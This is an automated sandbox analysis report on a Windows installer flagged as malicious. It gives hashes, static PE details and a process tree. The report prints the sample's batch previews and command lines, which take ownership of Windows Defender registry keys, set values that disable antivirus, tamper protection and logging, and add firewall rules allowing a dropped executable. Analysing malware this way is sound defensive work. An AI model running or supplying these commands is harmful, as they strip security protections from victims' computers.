SSDEEP:	24:HCZlGVbh9lGVb4iWlGVI9lGVZiWlGVR9lGVIiWlGVYh9lGVY4i8:HCZlGf9lG+vlGS9lGLvlGX9lG2vlGWhi
MD5:	B5A4A801110BF01C3B209959D75E6268
SHA1:	910D3C76B543D6D1EBF0319D3CCD0034A20C26BA
SHA-256:	4AE6C881FBA8868FEFA5C7E9D8B0FBB93FB207C4FB834CA323B3215CC76F694F
SHA-512:	78000CE7612958CBB01F77B3E18C4E4092FA31E7095C89C78FB297ED36D5601EF7ADF22D65C7AAA4A9228F3D0F4103ACD421AC1F60BF871B8148E5206EF92182
Malicious:	false
Preview:	@echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11803
Entropy (8bit):	5.183187239897201
Encrypted:	false
SSDEEP:	192:5BoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:EK
MD5:	B60D077ADF7BE05264F97AB9EB4A2A5E
SHA1:	6C96206552E0F447F0F91969EC74B1F1F69CDDB0
SHA-256:	F9BB94BE65B2E173E181AE6C2D0D2D9D045A4A98C774834417667B5A1671022E
SHA-512:	42C25078CD271E305803D640E1A6715DDF624615F68E1FE3F094F78B4D5DECD70E337282942ECF1544D398A82DF071C3E501AA81638AA5EFA40A24FB7B7B363E
Malicious:	false
Preview:	@echo off & title f & color 17.. cd %~dp0.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f.. reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f.. reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGea

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.2959870663251625
Encrypted:	false
SSDEEP:	96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
MD5:	B4579BC396ACE8CAFD9E825FF63FE244
SHA1:	32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
SHA-256:	01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
SHA-512:	3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.707238240195832
Encrypted:	false
SSDEEP:	48:6eamkugEfu1u8DMMvWlfeaQivkZZtMlDIra569FHpfbNtm:ImzJfvlfe61+fzNt
MD5:	F5BF0584C7936615D2C909288CA2C718
SHA1:	5C746BBB8D1EAF775277A279E05079EDB5BC10B3
SHA-256:	84578789733938BBB2FAEDDDB5048FE85322E97ED1B748F3FCDF514C798F5B97
SHA-512:	2A79F321D5BDEB8F4F85B2F3C72131CECD3BFC1D3DC3294212E6BF12C09CAED390D07BBDE6086E574D02115E6B244C48A2AE40136348BA01FC17332BCC77EF9E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 5%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U..e.........."...0..............(... ...@....@.. ....................................@.................................H(..O....@.......................`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................\|(......H........ ..X...........................................................n...r...p...(....r...p(......(.....0..%.......s........o.......,..o.....r...p(....*...................BSJB............v2.0.50727......l... ...#~..........#Strings....(...,...#US.T.......#GUID...d.......#Blob...........G..........3........................................................?.L.....L.........l..........."................._.....x.............-...~.-.....................d.....K.................

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe.config

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	239
Entropy (8bit):	5.021036233822738
Encrypted:	false
SSDEEP:	6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVazcrfyW3xm
MD5:	F2ECA2D00A9C69AF3E08C55DA5EC8299
SHA1:	5001564F3BFE5CDC60BDA5A14D8AF59105AB97DD
SHA-256:	6FC2543E8CD92F5DB9CAA385B64E5ABAB27D64D4F335B0E0F3A8FE8E87B8F181
SHA-512:	711072383DFB333A6C4ACE51E04C3FAA6B5D712533EEE0B2685DDBD00A45C4213203B62490A435E6F4AABD2F64319A25E71D0C6269E677F3B20EF90E7A98BFFC
Malicious:	true
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..

C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe

Download File

Process:	C:\Users\user\Desktop\4hIPvzV6a2.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.655569464152001
Encrypted:	false
SSDEEP:	96:/uidPNKO2mkcQ7DBOrkB0kPkKXwF4dkd8Nue3qYMns1BjgtRQWWzNt:FIOu7DBOrkB0kPkKXwF4dkd8Nn34nUBR
MD5:	7CB364701028767F8942CC3F8439F8F2
SHA1:	D6BEDE2206B7042B4CAE32F416E1B43FFAC94238
SHA-256:	A2716605F8DD1930808E6918DB670A3FE32287791862883DBABD26849B87B09E
SHA-512:	3011B3D64F79280AB05DE9658C4F5A13F637AD2E79D5770CFAEB3AF6CB8C7A56B610DAD69FDF295112BE64CFB80E18F30BB1829EB3C0E549105F63D0E770DC13
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dK............"...0.............:-... ...@....@.. ....................................`..................................,..O....@.......................`......P,..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P!...............................................................0..V.........(....,Lr...p......%..{..........%..{..........%..{..........%. ]X..(..........(......(.......0..Z.........}......}......}.............. ....}......(....-&..{....}......{....}......{....}.........0............(....,..{.............(....*BSJB............v4.0.30319......l.......#~..L.......#Strings.... ...$...#US.D.......#GUID...T.......#Blob...........W=.........3................#.......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.977075315758542
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4hIPvzV6a2.exe
File size:	884'928 bytes
MD5:	99a7d3f6669bc38e1fe1ca11e9085516
SHA1:	a81034e3d7c91817f2864795f85e2c137f3afafb
SHA256:	0a982520cd694fa4eed2a58829908080c9b004df99f79af26a0e3a86fa7197f0
SHA512:	2462e7df4ec8be2d5ef1a00c242d042988f2b61757c3d0ebafb1a2eaef54c73f2011e55faa2e2e0f90083fd8a2f1df5326c3ae82cd70adffc278242a8c747787
SSDEEP:	24576:OfLvipk/jcAoC53Ms9paV1NUUqg+QNylBRmtpQ3VD5F/QXQp:MSPCqsnaVnHB4lmtpQ3l5Wy
TLSH:	4A153305E75ED2C7F6D992331A3A3FB45FF3A9305A204B9347DCDEA8B928460B19D124
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

File Icon


Icon Hash:	0771ccf8d84d2907

Static PE Info

General

Entrypoint:	0x403532
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007FD298804F1Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007FD298804EE8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [004347B8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6c000	0x3ec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x68d8	0x6a00	742185983fa6320c910f81782213e56f	False	0.6695165094339622	data	6.478461709868021	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1464	0x1600	a995b118b38426885fc6ccaa984c8b7a	False	0.4314630681818182	data	4.969091535632612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2a818	0x600	9a9bf385a30f1656fc362172b16d9268	False	0.5247395833333334	data	4.172601271908501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x37000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6c000	0x3ec0	0x4000	d3c7dc45feefd6fa17ded897c3993d11	False	0.63311767578125	data	5.995004495484429	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x6c2b0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.7213883677298312
RT_ICON	0x6d358	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colors	English	United States	0.6751066098081023
RT_ICON	0x6e200	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colors	English	United States	0.7851985559566786
RT_ICON	0x6eaa8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colors	English	United States	0.6560693641618497
RT_ICON	0x6f010	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8031914893617021
RT_ICON	0x6f478	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.3118279569892473
RT_ICON	0x6f760	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States	0.36824324324324326
RT_DIALOG	0x6f888	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6f988	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6faa8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6fb08	0x68	data	English	United States	0.6634615384615384
RT_MANIFEST	0x6fb70	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5517241379310345

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	01:12:01
Start date:	22/09/2024
Path:	C:\Users\user\Desktop\4hIPvzV6a2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4hIPvzV6a2.exe"
Imagebase:	0x400000
File size:	884'928 bytes
MD5 hash:	99A7D3F6669BC38E1FE1CA11E9085516
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:12:01
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:12:01
Start date:	22/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:12:01
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:12:01
Start date:	22/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:12:01
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:12:01
Start date:	22/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:12:02
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:12:02
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:12:02
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:12:02
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:12:02
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:12:02
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:12:03
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:12:03
Start date:	22/09/2024
Path:	C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
Wow64 process (32bit):	false
Commandline:	SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
Imagebase:	0x7ff686820000
File size:	616'312 bytes
MD5 hash:	1FB64FF73938F4A04E97E5E7BF3D618C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:12:03
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:12:03
Start date:	22/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:12:03
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:12:04
Start date:	22/09/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
Imagebase:	0xd90000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
